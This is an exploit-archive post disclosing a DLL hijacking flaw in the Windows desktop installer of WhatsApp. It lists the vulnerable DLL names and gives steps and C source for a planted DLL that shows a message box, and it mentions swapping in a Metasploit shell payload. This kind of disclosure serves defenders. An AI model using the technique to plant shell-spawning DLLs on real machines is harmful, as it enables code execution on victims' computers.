Home / os / winmobile

WhatsApp DLL Hijacking

Posted on 09 September 2016

# Exploit Title: WhatsApp DLL Hijacking # Date: 8-9-2016 # Author: Ashiyane Digital Security Team # Vendor Homepage:https://www.whatsapp.com # software link: https://web.whatsapp.com/desktop/windows/release/ia32/WhatsAppSetup.exe # Tested on:Windows 7 ---------------------------------------------------------------------------------------------------------- vulnerable DLLs : api-ms-win-core-localization-obsolete-l1-2-0.dll api-ms-win-core-datetime-l1-1-1.dll ext-ms-win-kernel32-package-current-l1-1-0.dll api-ms-win-appmodel-runtime-l1-1-1.dll api-ms-win-core-localization-l1-2-1.dll api-ms-win-core-fibers-l1-1-1.dll api-ms-win-core-synch-l1-2-0.dll If an attacker can place the malicious dll with any names of above series in same location with WhatsApp.exe where victim open WhatsApp.exe it will load and run the attackers DLL and code. also can generate a msfpayload DLL and spawn a shell, for example. important: on windows 8.1 not tested ---------------------------------------------------------------------------------------------------------- # Exploit: 1- Save and compile below C code to create vuln DLL 2- Place vuln DLL on Same Directory of WhatsApp.exe 3- Open WhatsApp.exe //gcc test.c -o shcore.dll -shared //this dll show a message box #include <windows.h> #define DllExport __declspec (dllexport) BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; } int dll_hijack() { MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK); return 0; } ################# Discovered By : Amir.ght #################

 

TOP